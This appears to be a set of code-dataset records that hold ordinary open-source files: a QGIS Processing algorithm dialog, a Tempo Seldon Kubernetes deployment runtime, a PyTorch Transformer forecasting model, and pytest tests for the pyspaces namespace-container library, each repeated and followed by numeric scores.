self.messageBar().clearWidgets()
self.messageBar().pushMessage("", e.message,
level=Qgis.Warning, duration=5)
def finish(self, successful, result, context, feedback):
keepOpen = not successful or ProcessingConfig.getSetting(ProcessingConfig.KEEP_DIALOG_OPEN)
if self.iterateParam is None:
# add html results to results dock
for out in self.algorithm().outputDefinitions():
if isinstance(out, QgsProcessingOutputHtml) and out.name() in result and result[out.name()]:
resultsList.addResult(icon=self.algorithm().icon(), name=out.description(), timestamp=time.localtime(),
result=result[out.name()])
if not handleAlgorithmResults(self.algorithm(), context, feedback, not keepOpen, result):
self.resetGui()
return
self.setExecuted(True)
self.setResults(result)
self.setInfo(self.tr('Algorithm \'{0}\' finished').format(self.algorithm().displayName()), escapeHtml=False)
if not keepOpen:
self.close()
else:
self.resetGui()
if self.algorithm().hasHtmlOutputs():
self.setInfo(
self.tr('HTML output has been generated by this algorithm.'
'\nOpen the results dialog to check it.'), escapeHtml=False)
|
python/plugins/processing/gui/AlgorithmDialog.py
|
__author__ = '<NAME>'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, <NAME>'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '176c06ceefb5f555205e72b20c962740cc0ec183'
import os
from pprint import pformat
import time
from qgis.PyQt.QtCore import QCoreApplication, Qt
from qgis.PyQt.QtWidgets import QMessageBox, QPushButton, QSizePolicy, QDialogButtonBox
from qgis.PyQt.QtGui import QColor, QPalette
from qgis.core import (Qgis,
QgsProject,
QgsApplication,
QgsProcessingUtils,
QgsProcessingParameterDefinition,
QgsProcessingAlgRunnerTask,
QgsProcessingOutputHtml,
QgsProcessingParameterVectorDestination,
QgsProcessingOutputLayerDefinition,
QgsProcessingParameterFeatureSink,
QgsProcessingParameterRasterDestination,
QgsProcessingAlgorithm,
QgsProcessingParameters,
QgsProxyProgressTask,
QgsTaskManager)
from qgis.gui import (QgsGui,
QgsMessageBar,
QgsProcessingAlgorithmDialogBase)
from qgis.utils import iface
from processing.core.ProcessingLog import ProcessingLog
from processing.core.ProcessingConfig import ProcessingConfig
from processing.core.ProcessingResults import resultsList
from processing.gui.ParametersPanel import ParametersPanel
from processing.gui.BatchAlgorithmDialog import BatchAlgorithmDialog
from processing.gui.AlgorithmDialogBase import AlgorithmDialogBase
from processing.gui.AlgorithmExecutor import executeIterating, execute, execute_in_place
from processing.gui.Postprocessing import handleAlgorithmResults
from processing.gui.wrappers import WidgetWrapper
from processing.tools import dataobjects
class AlgorithmDialog(QgsProcessingAlgorithmDialogBase):
def __init__(self, alg, in_place=False, parent=None):
super().__init__(parent)
self.feedback_dialog = None
self.in_place = in_place
self.active_layer = None
self.context = None
self.feedback = None
self.setAlgorithm(alg)
self.setMainWidget(self.getParametersPanel(alg, self))
if not self.in_place:
self.runAsBatchButton = QPushButton(QCoreApplication.translate("AlgorithmDialog", "Run as Batch Process…"))
self.runAsBatchButton.clicked.connect(self.runAsBatch)
self.buttonBox().addButton(self.runAsBatchButton, QDialogButtonBox.ResetRole) # reset role to ensure left alignment
else:
self.active_layer = iface.activeLayer()
self.runAsBatchButton = None
has_selection = self.active_layer and (self.active_layer.selectedFeatureCount() > 0)
self.buttonBox().button(QDialogButtonBox.Ok).setText(QCoreApplication.translate("AlgorithmDialog", "Modify Selected Features")
if has_selection else QCoreApplication.translate("AlgorithmDialog", "Modify All Features"))
self.buttonBox().button(QDialogButtonBox.Close).setText(QCoreApplication.translate("AlgorithmDialog", "Cancel"))
self.setWindowTitle(self.windowTitle() + ' | ' + self.active_layer.name())
def getParametersPanel(self, alg, parent):
return ParametersPanel(parent, alg, self.in_place)
def runAsBatch(self):
self.close()
dlg = BatchAlgorithmDialog(self.algorithm().create(), parent=iface.mainWindow())
dlg.show()
dlg.exec_()
def setParameters(self, parameters):
self.mainWidget().setParameters(parameters)
def getParameterValues(self):
parameters = {}
if self.mainWidget() is None:
return parameters
for param in self.algorithm().parameterDefinitions():
if param.flags() & QgsProcessingParameterDefinition.FlagHidden:
continue
if not param.isDestination():
if self.in_place and param.name() == 'INPUT':
parameters[param.name()] = self.active_layer
continue
try:
wrapper = self.mainWidget().wrappers[param.name()]
except KeyError:
continue
# For compatibility with 3.x API, we need to check whether the wrapper is
# the deprecated WidgetWrapper class. If not, it's the newer
# QgsAbstractProcessingParameterWidgetWrapper class
# TODO QGIS 4.0 - remove
if issubclass(wrapper.__class__, WidgetWrapper):
widget = wrapper.widget
else:
widget = wrapper.wrappedWidget()
if widget is None:
continue
value = wrapper.parameterValue()
parameters[param.name()] = value
if not param.checkValueIsAcceptable(value):
raise AlgorithmDialogBase.InvalidParameterValue(param, widget)
else:
if self.in_place and param.name() == 'OUTPUT':
parameters[param.name()] = 'memory:'
continue
dest_project = None
if not param.flags() & QgsProcessingParameterDefinition.FlagHidden and \
isinstance(param, (QgsProcessingParameterRasterDestination,
QgsProcessingParameterFeatureSink,
QgsProcessingParameterVectorDestination)):
if self.mainWidget().checkBoxes[param.name()].isChecked():
dest_project = QgsProject.instance()
widget = self.mainWidget().outputWidgets[param.name()]
value = widget.getValue()
if value and isinstance(value, QgsProcessingOutputLayerDefinition):
value.destinationProject = dest_project
if value:
parameters[param.name()] = value
if param.isDestination():
context = dataobjects.createContext()
ok, error = self.algorithm().provider().isSupportedOutputValue(value, param, context)
if not ok:
raise AlgorithmDialogBase.InvalidOutputExtension(widget, error)
return self.algorithm().preprocessParameters(parameters)
def runAlgorithm(self):
self.feedback = self.createFeedback()
self.context = dataobjects.createContext(self.feedback)
checkCRS = ProcessingConfig.getSetting(ProcessingConfig.WARN_UNMATCHING_CRS)
try:
parameters = self.getParameterValues()
if checkCRS and not self.algorithm().validateInputCrs(parameters, self.context):
reply = QMessageBox.question(self, self.tr("Unmatching CRS's"),
self.tr('Parameters do not all use the same CRS. This can '
'cause unexpected results.\nDo you want to '
'continue?'),
QMessageBox.Yes | QMessageBox.No,
QMessageBox.No)
if reply == QMessageBox.No:
return
ok, msg = self.algorithm().checkParameterValues(parameters, self.context)
if not ok:
QMessageBox.warning(
self, self.tr('Unable to execute algorithm'), msg)
return
self.runButton().setEnabled(False)
self.cancelButton().setEnabled(False)
buttons = self.mainWidget().iterateButtons
self.iterateParam = None
for i in range(len(list(buttons.values()))):
button = list(buttons.values())[i]
if button.isChecked():
self.iterateParam = list(buttons.keys())[i]
break
self.clearProgress()
self.feedback.pushVersionInfo(self.algorithm().provider())
self.setProgressText(QCoreApplication.translate('AlgorithmDialog', 'Processing algorithm…'))
self.setInfo(
QCoreApplication.translate('AlgorithmDialog', '<b>Algorithm \'{0}\' starting…</b>').format(self.algorithm().displayName()), escapeHtml=False)
self.feedback.pushInfo(self.tr('Input parameters:'))
display_params = []
for k, v in parameters.items():
display_params.append("'" + k + "' : " + self.algorithm().parameterDefinition(k).valueAsPythonString(v, self.context))
self.feedback.pushCommandInfo('{ ' + ', '.join(display_params) + ' }')
self.feedback.pushInfo('')
start_time = time.time()
if self.iterateParam:
# Make sure the Log tab is visible before executing the algorithm
try:
self.showLog()
self.repaint()
except:
pass
self.cancelButton().setEnabled(self.algorithm().flags() & QgsProcessingAlgorithm.FlagCanCancel)
if executeIterating(self.algorithm(), parameters, self.iterateParam, self.context, self.feedback):
self.feedback.pushInfo(
self.tr('Execution completed in {0:0.2f} seconds').format(time.time() - start_time))
self.cancelButton().setEnabled(False)
self.finish(True, parameters, self.context, self.feedback)
else:
self.cancelButton().setEnabled(False)
self.resetGui()
else:
command = self.algorithm().asPythonCommand(parameters, self.context)
if command:
ProcessingLog.addToLog(command)
QgsGui.instance().processingRecentAlgorithmLog().push(self.algorithm().id())
self.cancelButton().setEnabled(self.algorithm().flags() & QgsProcessingAlgorithm.FlagCanCancel)
def on_complete(ok, results):
if ok:
self.feedback.pushInfo(self.tr('Execution completed in {0:0.2f} seconds').format(time.time() - start_time))
self.feedback.pushInfo(self.tr('Results:'))
self.feedback.pushCommandInfo(pformat(results))
else:
self.feedback.reportError(
self.tr('Execution failed after {0:0.2f} seconds').format(time.time() - start_time))
self.feedback.pushInfo('')
if self.feedback_dialog is not None:
self.feedback_dialog.close()
self.feedback_dialog.deleteLater()
self.feedback_dialog = None
self.cancelButton().setEnabled(False)
if not self.in_place:
self.finish(ok, results, self.context, self.feedback)
elif ok:
self.close()
self.feedback = None
self.context = None
if not self.in_place and not (self.algorithm().flags() & QgsProcessingAlgorithm.FlagNoThreading):
# Make sure the Log tab is visible before executing the algorithm
self.showLog()
task = QgsProcessingAlgRunnerTask(self.algorithm(), parameters, self.context, self.feedback)
if task.isCanceled():
on_complete(False, {})
else:
task.executed.connect(on_complete)
self.setCurrentTask(task)
else:
self.proxy_progress = QgsProxyProgressTask(QCoreApplication.translate("AlgorithmDialog", "Executing “{}”").format(self.algorithm().displayName()))
QgsApplication.taskManager().addTask(self.proxy_progress)
self.feedback.progressChanged.connect(self.proxy_progress.setProxyProgress)
self.feedback_dialog = self.createProgressDialog()
self.feedback_dialog.show()
if self.in_place:
ok, results = execute_in_place(self.algorithm(), parameters, self.context, self.feedback)
else:
ok, results = execute(self.algorithm(), parameters, self.context, self.feedback)
self.feedback.progressChanged.disconnect()
self.proxy_progress.finalize(ok)
on_complete(ok, results)
except AlgorithmDialogBase.InvalidParameterValue as e:
try:
self.buttonBox().accepted.connect(lambda e=e:
e.widget.setPalette(QPalette()))
palette = e.widget.palette()
palette.setColor(QPalette.Base, QColor(255, 255, 0))
e.widget.setPalette(palette)
except:
pass
self.messageBar().clearWidgets()
self.messageBar().pushMessage("", self.tr("Wrong or missing parameter value: {0}").format(e.parameter.description()),
level=Qgis.Warning, duration=5)
except AlgorithmDialogBase.InvalidOutputExtension as e:
try:
self.buttonBox().accepted.connect(lambda e=e:
e.widget.setPalette(QPalette()))
palette = e.widget.palette()
palette.setColor(QPalette.Base, QColor(255, 255, 0))
e.widget.setPalette(palette)
except:
pass
self.messageBar().clearWidgets()
self.messageBar().pushMessage("", e.message,
level=Qgis.Warning, duration=5)
def finish(self, successful, result, context, feedback):
keepOpen = not successful or ProcessingConfig.getSetting(ProcessingConfig.KEEP_DIALOG_OPEN)
if self.iterateParam is None:
# add html results to results dock
for out in self.algorithm().outputDefinitions():
if isinstance(out, QgsProcessingOutputHtml) and out.name() in result and result[out.name()]:
resultsList.addResult(icon=self.algorithm().icon(), name=out.description(), timestamp=time.localtime(),
result=result[out.name()])
if not handleAlgorithmResults(self.algorithm(), context, feedback, not keepOpen, result):
self.resetGui()
return
self.setExecuted(True)
self.setResults(result)
self.setInfo(self.tr('Algorithm \'{0}\' finished').format(self.algorithm().displayName()), escapeHtml=False)
if not keepOpen:
self.close()
else:
self.resetGui()
if self.algorithm().hasHtmlOutputs():
self.setInfo(
self.tr('HTML output has been generated by this algorithm.'
'\nOpen the results dialog to check it.'), escapeHtml=False)
| 0.350755 | 0.09451 |
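The non-blocking branch of runAlgorithm() above reduces to a small pattern: wrap the algorithm in a QgsProcessingAlgRunnerTask, connect its executed signal to a callback, and hand the task to the task manager. A hedged standalone sketch of that pattern follows; it assumes it runs inside QGIS with the Processing provider loaded, and the algorithm id and empty parameter dict are placeholders.
from qgis.core import (QgsApplication, QgsProcessingAlgRunnerTask,
                       QgsProcessingContext, QgsProcessingFeedback)
alg = QgsApplication.processingRegistry().algorithmById('native:buffer')  # example id
context = QgsProcessingContext()
feedback = QgsProcessingFeedback()
params = {}  # real parameter values would go here
def on_complete(ok, results):
    # invoked on the main thread once the background task has finished
    print(ok, results)
task = QgsProcessingAlgRunnerTask(alg, params, context, feedback)
task.executed.connect(on_complete)
QgsApplication.taskManager().addTask(task)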
import json
import time
from typing import Optional, Sequence
import yaml
from kubernetes import client
from kubernetes.client.rest import ApiException
from tempo.k8s.constants import TempoK8sLabel, TempoK8sModelSpecAnnotation
from tempo.k8s.utils import create_k8s_client
from tempo.seldon.endpoint import Endpoint
from tempo.seldon.specs import KubernetesSpec
from tempo.serve.base import DeployedModel, ModelSpec, Runtime
from tempo.serve.metadata import RuntimeOptions
from tempo.serve.stub import deserialize
from tempo.utils import logger
class SeldonCoreOptions(RuntimeOptions):
runtime: str = "tempo.seldon.SeldonKubernetesRuntime"
class SeldonKubernetesRuntime(Runtime):
def __init__(self, runtime_options: Optional[RuntimeOptions] = None):
if runtime_options is None:
runtime_options = RuntimeOptions()
runtime_options.runtime = "tempo.seldon.SeldonKubernetesRuntime"
super().__init__(runtime_options)
def get_endpoint_spec(self, model_spec: ModelSpec) -> str:
create_k8s_client()
endpoint = Endpoint()
return endpoint.get_url(model_spec)
def undeploy_spec(self, model_spec: ModelSpec):
create_k8s_client()
api_instance = client.CustomObjectsApi()
api_instance.delete_namespaced_custom_object(
"machinelearning.seldon.io",
"v1",
model_spec.runtime_options.k8s_options.namespace,
"seldondeployments",
model_spec.model_details.name,
body=client.V1DeleteOptions(propagation_policy="Foreground"),
)
def deploy_spec(self, model_spec: ModelSpec):
create_k8s_client()
k8s_specer = KubernetesSpec(model_spec)
k8s_spec = k8s_specer.spec
logger.debug(k8s_spec)
api_instance = client.CustomObjectsApi()
try:
existing = api_instance.get_namespaced_custom_object(
"machinelearning.seldon.io",
"v1",
model_spec.runtime_options.k8s_options.namespace,
"seldondeployments",
model_spec.model_details.name,
)
k8s_spec["metadata"]["resourceVersion"] = existing["metadata"]["resourceVersion"]
api_instance.replace_namespaced_custom_object(
"machinelearning.seldon.io",
"v1",
model_spec.runtime_options.k8s_options.namespace,
"seldondeployments",
model_spec.model_details.name,
k8s_spec,
)
except ApiException as e:
if e.status == 404:
api_instance.create_namespaced_custom_object(
"machinelearning.seldon.io",
"v1",
model_spec.runtime_options.k8s_options.namespace,
"seldondeployments",
k8s_spec,
)
else:
raise e
def wait_ready_spec(self, model_spec: ModelSpec, timeout_secs=None) -> bool:
create_k8s_client()
ready = False
t0 = time.time()
while not ready:
api_instance = client.CustomObjectsApi()
existing = api_instance.get_namespaced_custom_object(
"machinelearning.seldon.io",
"v1",
model_spec.runtime_options.k8s_options.namespace,
"seldondeployments",
model_spec.model_details.name,
)
if "status" in existing and "state" in existing["status"]:
ready = existing["status"]["state"] == "Available"
if timeout_secs is not None:
t1 = time.time()
if t1 - t0 > timeout_secs:
return ready
return ready
def to_k8s_yaml_spec(self, model_spec: ModelSpec) -> str:
k8s_spec = KubernetesSpec(model_spec)
return yaml.safe_dump(k8s_spec.spec)
def list_models(self, namespace: Optional[str] = None) -> Sequence[DeployedModel]:
create_k8s_client()
api_instance = client.CustomObjectsApi()
if namespace is None and self.runtime_options is not None:
namespace = self.runtime_options.k8s_options.namespace
if namespace is None:
return []
try:
models = []
response = api_instance.list_namespaced_custom_object(
group="machinelearning.seldon.io",
version="v1",
namespace=namespace,
plural="seldondeployments",
label_selector=TempoK8sLabel + "=true",
)
for model in response["items"]:
metadata = model["metadata"]["annotations"][TempoK8sModelSpecAnnotation]
remote_model = deserialize(json.loads(metadata))
models.append(remote_model)
return models
except ApiException as e:
if e.status == 404:
return []
else:
raise e
|
tempo/seldon/k8s.py
|
import json
import time
from typing import Optional, Sequence
import yaml
from kubernetes import client
from kubernetes.client.rest import ApiException
from tempo.k8s.constants import TempoK8sLabel, TempoK8sModelSpecAnnotation
from tempo.k8s.utils import create_k8s_client
from tempo.seldon.endpoint import Endpoint
from tempo.seldon.specs import KubernetesSpec
from tempo.serve.base import DeployedModel, ModelSpec, Runtime
from tempo.serve.metadata import RuntimeOptions
from tempo.serve.stub import deserialize
from tempo.utils import logger
class SeldonCoreOptions(RuntimeOptions):
runtime: str = "tempo.seldon.SeldonKubernetesRuntime"
class SeldonKubernetesRuntime(Runtime):
def __init__(self, runtime_options: Optional[RuntimeOptions] = None):
if runtime_options is None:
runtime_options = RuntimeOptions()
runtime_options.runtime = "tempo.seldon.SeldonKubernetesRuntime"
super().__init__(runtime_options)
def get_endpoint_spec(self, model_spec: ModelSpec) -> str:
create_k8s_client()
endpoint = Endpoint()
return endpoint.get_url(model_spec)
def undeploy_spec(self, model_spec: ModelSpec):
create_k8s_client()
api_instance = client.CustomObjectsApi()
api_instance.delete_namespaced_custom_object(
"machinelearning.seldon.io",
"v1",
model_spec.runtime_options.k8s_options.namespace,
"seldondeployments",
model_spec.model_details.name,
body=client.V1DeleteOptions(propagation_policy="Foreground"),
)
def deploy_spec(self, model_spec: ModelSpec):
create_k8s_client()
k8s_specer = KubernetesSpec(model_spec)
k8s_spec = k8s_specer.spec
logger.debug(k8s_spec)
api_instance = client.CustomObjectsApi()
try:
existing = api_instance.get_namespaced_custom_object(
"machinelearning.seldon.io",
"v1",
model_spec.runtime_options.k8s_options.namespace,
"seldondeployments",
model_spec.model_details.name,
)
k8s_spec["metadata"]["resourceVersion"] = existing["metadata"]["resourceVersion"]
api_instance.replace_namespaced_custom_object(
"machinelearning.seldon.io",
"v1",
model_spec.runtime_options.k8s_options.namespace,
"seldondeployments",
model_spec.model_details.name,
k8s_spec,
)
except ApiException as e:
if e.status == 404:
api_instance.create_namespaced_custom_object(
"machinelearning.seldon.io",
"v1",
model_spec.runtime_options.k8s_options.namespace,
"seldondeployments",
k8s_spec,
)
else:
raise e
def wait_ready_spec(self, model_spec: ModelSpec, timeout_secs=None) -> bool:
create_k8s_client()
ready = False
t0 = time.time()
while not ready:
api_instance = client.CustomObjectsApi()
existing = api_instance.get_namespaced_custom_object(
"machinelearning.seldon.io",
"v1",
model_spec.runtime_options.k8s_options.namespace,
"seldondeployments",
model_spec.model_details.name,
)
if "status" in existing and "state" in existing["status"]:
ready = existing["status"]["state"] == "Available"
if timeout_secs is not None:
t1 = time.time()
if t1 - t0 > timeout_secs:
return ready
return ready
def to_k8s_yaml_spec(self, model_spec: ModelSpec) -> str:
k8s_spec = KubernetesSpec(model_spec)
return yaml.safe_dump(k8s_spec.spec)
def list_models(self, namespace: Optional[str] = None) -> Sequence[DeployedModel]:
create_k8s_client()
api_instance = client.CustomObjectsApi()
if namespace is None and self.runtime_options is not None:
namespace = self.runtime_options.k8s_options.namespace
if namespace is None:
return []
try:
models = []
response = api_instance.list_namespaced_custom_object(
group="machinelearning.seldon.io",
version="v1",
namespace=namespace,
plural="seldondeployments",
label_selector=TempoK8sLabel + "=true",
)
for model in response["items"]:
metadata = model["metadata"]["annotations"][TempoK8sModelSpecAnnotation]
remote_model = deserialize(json.loads(metadata))
models.append(remote_model)
return models
except ApiException as e:
if e.status == 404:
return []
else:
raise e
| 0.68595 | 0.14445 |
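deploy_spec() above is an instance of the usual create-or-replace handling for Kubernetes custom resources. A minimal sketch of just that pattern follows; the helper name is made up, while the group, version and plural are the SeldonDeployment values used in the code above.
from kubernetes import client
from kubernetes.client.rest import ApiException
def apply_seldon_deployment(spec: dict, namespace: str):
    api = client.CustomObjectsApi()
    name = spec["metadata"]["name"]
    try:
        existing = api.get_namespaced_custom_object(
            "machinelearning.seldon.io", "v1", namespace, "seldondeployments", name)
        # a replace needs the current resourceVersion to be accepted by the API server
        spec["metadata"]["resourceVersion"] = existing["metadata"]["resourceVersion"]
        api.replace_namespaced_custom_object(
            "machinelearning.seldon.io", "v1", namespace, "seldondeployments", name, spec)
    except ApiException as e:
        if e.status == 404:
            # the resource does not exist yet, so create it instead
            api.create_namespaced_custom_object(
                "machinelearning.seldon.io", "v1", namespace, "seldondeployments", spec)
        else:
            raise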
import torch
import torch.nn as nn
import torch.nn.functional as F
from layers.Transformer_EncDec import Decoder, DecoderLayer, Encoder, EncoderLayer, ConvLayer
from layers.SelfAttention_Family import FullAttention, AttentionLayer
from layers.Embed import DataEmbedding
import numpy as np
class Transformer(nn.Module):
"""
Vanilla Transformer with O(L^2) complexity
"""
def __init__(self, args):
super(Transformer, self).__init__()
self.args = args
self.pred_len = args.pred_len
self.output_attention = args.output_attention
# Embedding
self.enc_embedding = DataEmbedding(args.enc_in, args.d_model, args.embed, args.freq,
args.dropout)
self.dec_embedding = DataEmbedding(args.dec_in, args.d_model, args.embed, args.freq,
args.dropout)
# Encoder
self.encoder = Encoder(
[
EncoderLayer(
AttentionLayer(
FullAttention(False, args.factor, attention_dropout=args.dropout,
output_attention=args.output_attention),
args.d_model, args.n_heads, mix=False),
args.d_model,
args.d_ff,
dropout=args.dropout,
activation=args.activation
) for l in range(args.e_layers)
],
[
ConvLayer(
args.d_model
) for l in range(args.e_layers - 1)
] if args.distil else None,
norm_layer=torch.nn.LayerNorm(args.d_model)
)
# Decoder
self.decoder = Decoder(
[
DecoderLayer(
AttentionLayer(
FullAttention(True, args.factor, attention_dropout=args.dropout, output_attention=False),
args.d_model, args.n_heads, mix=args.mix),
AttentionLayer(
FullAttention(False, args.factor, attention_dropout=args.dropout, output_attention=False),
args.d_model, args.n_heads, mix=False),
args.d_model,
args.d_ff,
dropout=args.dropout,
activation=args.activation,
)
for l in range(args.d_layers)
],
norm_layer=torch.nn.LayerNorm(args.d_model),
projection=nn.Linear(args.d_model, args.out_size, bias=True)
)
def forward(self, x_enc, x_mark_enc, x_dec, x_mark_dec,
enc_self_mask=None, dec_self_mask=None, dec_enc_mask=None):
enc_out = self.enc_embedding(x_enc, x_mark_enc)
enc_out, attns = self.encoder(enc_out, attn_mask=enc_self_mask)
dec_out = self.dec_embedding(x_dec, x_mark_dec)
dec_out = self.decoder(dec_out, enc_out, x_mask=dec_self_mask, cross_mask=dec_enc_mask)
if self.output_attention:
return dec_out[:, -self.pred_len:, :], attns
else:
return dec_out[:, -self.pred_len:, :] # [B, L, D]
|
models/seq2seq/Transformer.py
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from layers.Transformer_EncDec import Decoder, DecoderLayer, Encoder, EncoderLayer, ConvLayer
from layers.SelfAttention_Family import FullAttention, AttentionLayer
from layers.Embed import DataEmbedding
import numpy as np
class Transformer(nn.Module):
"""
Vanilla Transformer with O(L^2) complexity
"""
def __init__(self, args):
super(Transformer, self).__init__()
self.args = args
self.pred_len = args.pred_len
self.output_attention = args.output_attention
# Embedding
self.enc_embedding = DataEmbedding(args.enc_in, args.d_model, args.embed, args.freq,
args.dropout)
self.dec_embedding = DataEmbedding(args.dec_in, args.d_model, args.embed, args.freq,
args.dropout)
# Encoder
self.encoder = Encoder(
[
EncoderLayer(
AttentionLayer(
FullAttention(False, args.factor, attention_dropout=args.dropout,
output_attention=args.output_attention),
args.d_model, args.n_heads, mix=False),
args.d_model,
args.d_ff,
dropout=args.dropout,
activation=args.activation
) for l in range(args.e_layers)
],
[
ConvLayer(
args.d_model
) for l in range(args.e_layers - 1)
] if args.distil else None,
norm_layer=torch.nn.LayerNorm(args.d_model)
)
# Decoder
self.decoder = Decoder(
[
DecoderLayer(
AttentionLayer(
FullAttention(True, args.factor, attention_dropout=args.dropout, output_attention=False),
args.d_model, args.n_heads, mix=args.mix),
AttentionLayer(
FullAttention(False, args.factor, attention_dropout=args.dropout, output_attention=False),
args.d_model, args.n_heads, mix=False),
args.d_model,
args.d_ff,
dropout=args.dropout,
activation=args.activation,
)
for l in range(args.d_layers)
],
norm_layer=torch.nn.LayerNorm(args.d_model),
projection=nn.Linear(args.d_model, args.out_size, bias=True)
)
def forward(self, x_enc, x_mark_enc, x_dec, x_mark_dec,
enc_self_mask=None, dec_self_mask=None, dec_enc_mask=None):
enc_out = self.enc_embedding(x_enc, x_mark_enc)
enc_out, attns = self.encoder(enc_out, attn_mask=enc_self_mask)
dec_out = self.dec_embedding(x_dec, x_mark_dec)
dec_out = self.decoder(dec_out, enc_out, x_mask=dec_self_mask, cross_mask=dec_enc_mask)
if self.output_attention:
return dec_out[:, -self.pred_len:, :], attns
else:
return dec_out[:, -self.pred_len:, :] # [B, L, D]
| 0.928854 | 0.310139 |
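A hedged usage sketch for the model above: the hyper-parameter names mirror the attributes read from args in the code, but the tensor layouts (values of shape [batch, length, channels] plus four time-feature marks per step for hourly data) and the label length of 48 are assumptions, and the repository's layers package must be importable.
from types import SimpleNamespace
import torch
args = SimpleNamespace(pred_len=24, enc_in=7, dec_in=7, out_size=7, d_model=512,
                       n_heads=8, e_layers=2, d_layers=1, d_ff=2048, factor=5,
                       dropout=0.05, embed='timeF', freq='h', activation='gelu',
                       distil=True, mix=True, output_attention=False)
model = Transformer(args)
B, L_enc, L_dec = 2, 96, 48 + args.pred_len  # 48 is an assumed label length
x_enc = torch.randn(B, L_enc, args.enc_in)
x_mark_enc = torch.randn(B, L_enc, 4)        # assumed: 4 time features for freq='h'
x_dec = torch.randn(B, L_dec, args.dec_in)
x_mark_dec = torch.randn(B, L_dec, 4)
out = model(x_enc, x_mark_enc, x_dec, x_mark_dec)  # expected shape: [B, pred_len, out_size]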
import os
import pytest
import subprocess as s
from pyspaces import Container, Chroot, Inject, setns
def execute(argv):
"""Execute programm with arguments.
Args:
*args (list): arguments
"""
os.execvp(argv[0], argv)
def test_basic_container(capfd):
"""Check basic namespace.
```
bash# mount -t proc proc /proc
bash# ps ax
PID TTY STAT TIME COMMAND
1 pts/3 S 0:00 bash
22 pts/3 R+ 0:00 ps ax
```
"""
cmd = "mount -t proc proc /proc; ps ax"
c = Container(target=execute, args=(('bash', '-c', cmd),),
uid_map='0 1000 1',
newpid=True, newuser=True, newns=True
)
c.start()
c.join()
out, err = capfd.readouterr()
print(out, err)
assert len(out.splitlines()) == 3
def test_all_ns_container(capfd):
"""Check all namespaces.
```
bash# mount -t proc proc /proc
bash# ps ax
PID TTY STAT TIME COMMAND
1 pts/3 S 0:00 bash
22 pts/3 R+ 0:00 ps ax
```
"""
cmd = "mount -t proc proc /proc; ps ax"
c = Container(target=execute, args=(('bash', '-c', cmd),),
uid_map='0 1000 1', all=True
)
c.start()
c.join()
out, err = capfd.readouterr()
print(out, err)
assert len(out.splitlines()) == 3
def test_not_all_ns_container(capfd):
"""Check all namespaces without network ns.
```
bash# mount -t proc proc /proc
bash# ps ax
PID TTY STAT TIME COMMAND
1 pts/3 S 0:00 bash
22 pts/3 R+ 0:00 ps ax
```
"""
cmd = "mount -t proc proc /proc; ps ax; sleep 0.1"
c = Container(target=execute, args=(('bash', '-c', cmd),),
uid_map='0 1000 1', all=True, net=False
)
c.start()
out, err = capfd.readouterr()
out0 = s.check_output("ifconfig -a", shell=True)
i = Inject(target=execute, args=(('ifconfig', '-a'),),
target_pid=c.pid, all=True
)
i.start()
i.join()
c.join()
out, err = capfd.readouterr()
print(out0)
print(out, err)
assert out != out0
def test_basic_chroot(capfd):
"""Check basic chroot"""
c = Chroot(target=execute, args=(('/bin/ls', '/home/'),),
uid_map=True, newpid=True,
path=os.path.expanduser('~/.local/share/lxc/ubuntu/rootfs/')
)
c.start()
c.join()
out, err = capfd.readouterr()
print(out, err)
assert out == 'ubuntu\n'
def test_all_inject(capfd):
"""Check all ns inject"""
c = Container(target=execute, args=(('bash','-c',
'mount -t proc /proc; sleep 0.1'),),
uid_map='1000', all=True
)
c.start()
i = Inject(target=execute, args=(('bash', '-c', 'id'),),
target_pid=c.pid, all=True
)
i.start()
i.join()
c.join()
out, err = capfd.readouterr()
print(out, err)
assert out.split()[:2] == ["uid=0(root)", "gid=65534(nogroup)"]
def test_not_all_inject(capfd):
"""Check inject without network ns"""
c = Container(target=execute, args=(('bash','-c',
'mount -t proc /proc; sleep 2'),),
uid_map='1000', all=True, net=False
)
c.start()
out0 = s.check_output("ifconfig -a", shell=True)
i = Inject(target=execute, args=(('ifconfig', '-a'),),
target_pid=c.pid, all=True
)
i.start()
i.join()
c.join()
out, err = capfd.readouterr()
print(out0)
print(out, err)
assert out != out0
def test_all_setns(capfd):
"""Check basic inject"""
c = Container(target=execute, args=(('bash','-c',
'mount -t proc /proc; sleep 2'),),
uid_map='1000', all=True
)
c.start()
with setns(c.pid, all=True):
outt = s.check_output("id", shell=True)
out, err = capfd.readouterr()
print(out, err)
print(outt)
c.join()
assert outt.split()[:2] == ["uid=0(root)", "gid=65534(nogroup)"]
if __name__ == '__main__':
pytest.main()
|
tests/test_create_container.py
|
import os
import pytest
import subprocess as s
from pyspaces import Container, Chroot, Inject, setns
def execute(argv):
"""Execute programm with arguments.
Args:
*args (list): arguments
"""
os.execvp(argv[0], argv)
def test_basic_container(capfd):
"""Check basic namespace.
```
bash# mount -t proc proc /proc
bash# ps ax
PID TTY STAT TIME COMMAND
1 pts/3 S 0:00 bash
22 pts/3 R+ 0:00 ps ax
```
"""
cmd = "mount -t proc proc /proc; ps ax"
c = Container(target=execute, args=(('bash', '-c', cmd),),
uid_map='0 1000 1',
newpid=True, newuser=True, newns=True
)
c.start()
c.join()
out, err = capfd.readouterr()
print(out, err)
assert len(out.splitlines()) == 3
def test_all_ns_container(capfd):
"""Check all namespaces.
```
bash# mount -t proc proc /proc
bash# ps ax
PID TTY STAT TIME COMMAND
1 pts/3 S 0:00 bash
22 pts/3 R+ 0:00 ps ax
```
"""
cmd = "mount -t proc proc /proc; ps ax"
c = Container(target=execute, args=(('bash', '-c', cmd),),
uid_map='0 1000 1', all=True
)
c.start()
c.join()
out, err = capfd.readouterr()
print(out, err)
assert len(out.splitlines()) == 3
def test_not_all_ns_container(capfd):
"""Check all namespaces without network ns.
```
bash# mount -t proc proc /proc
bash# ps ax
PID TTY STAT TIME COMMAND
1 pts/3 S 0:00 bash
22 pts/3 R+ 0:00 ps ax
```
"""
cmd = "mount -t proc proc /proc; ps ax; sleep 0.1"
c = Container(target=execute, args=(('bash', '-c', cmd),),
uid_map='0 1000 1', all=True, net=False
)
c.start()
out, err = capfd.readouterr()
out0 = s.check_output("ifconfig -a", shell=True)
i = Inject(target=execute, args=(('ifconfig', '-a'),),
target_pid=c.pid, all=True
)
i.start()
i.join()
c.join()
out, err = capfd.readouterr()
print(out0)
print(out, err)
assert out != out0
def test_basic_chroot(capfd):
"""Check basic chroot"""
c = Chroot(target=execute, args=(('/bin/ls', '/home/'),),
uid_map=True, newpid=True,
